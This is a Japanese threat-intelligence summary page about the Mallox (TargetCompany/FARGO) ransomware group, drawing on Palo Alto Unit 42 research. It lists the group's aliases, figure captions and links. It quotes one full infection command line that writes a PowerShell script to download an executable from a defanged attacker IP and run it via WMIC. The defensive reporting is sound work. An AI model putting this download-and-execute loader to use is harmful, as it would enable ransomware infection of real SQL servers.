【別名】
攻撃組織名 |
命名組織 |
---|---|
Mallox | |
TargetCompany | |
FARGO | |
Tohnichi |
【図表】
パロアルトネットワークスのテレメトリーに基づく Mallox の攻撃試行数の推移 (2022 年後半 〜 2023 年前半)
Cortex XDR / XSIAM で SQL サーバーのエクスプロイト プロセス ツリーを表示したところ。ここでは検証のため「検出のみ」のモードに設定してある
Cortex XDR / XSIAM で攻撃の完全なプロセス ツリーを表示したところ。ここでは検証のため「検出のみ」のモードに設定してある
出典: https://unit42.paloaltonetworks.jp/mallox-ransomware/
"\"C:\\Windows\\\\System32\\\\cmd.exe\" /C echo $cl = New-Object System.Net.WebClient > C:\Users\MSSQLS~1\AppData\Local\Temp\updt.ps1 & echo $cl.DownloadFile(\"hxxp://80.66.75[.]36/aRX.exe\", \"C:\Users\MSSQLS~1\AppData\Local\Temp\tzt.exe\") >> %TEMP%\\updt.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQLS~1\AppData\Local\Temp\updt.ps1 & WMIC process call create \"C:\Users\MSSQLS~1\AppData\Local\Temp\tzt.exe\""
Mallox ランサムウェアが感染に使うコマンド ライン
出典: https://unit42.paloaltonetworks.jp/mallox-ransomware/
【ブログ】
◆脅威グループの評価: Mallox ランサムウェア (UNIT42(paloalto), 2023/07/20 19:16)
https://unit42.paloaltonetworks.jp/mallox-ransomware/
【関連まとめ記事】
◆全体まとめ
◆マルウェア / Malware (まとめ)
◆ランサムウェア (まとめ)
◆Fargo / Mallox (まとめ)
https://malware-log.hatenablog.com/entry/Fargo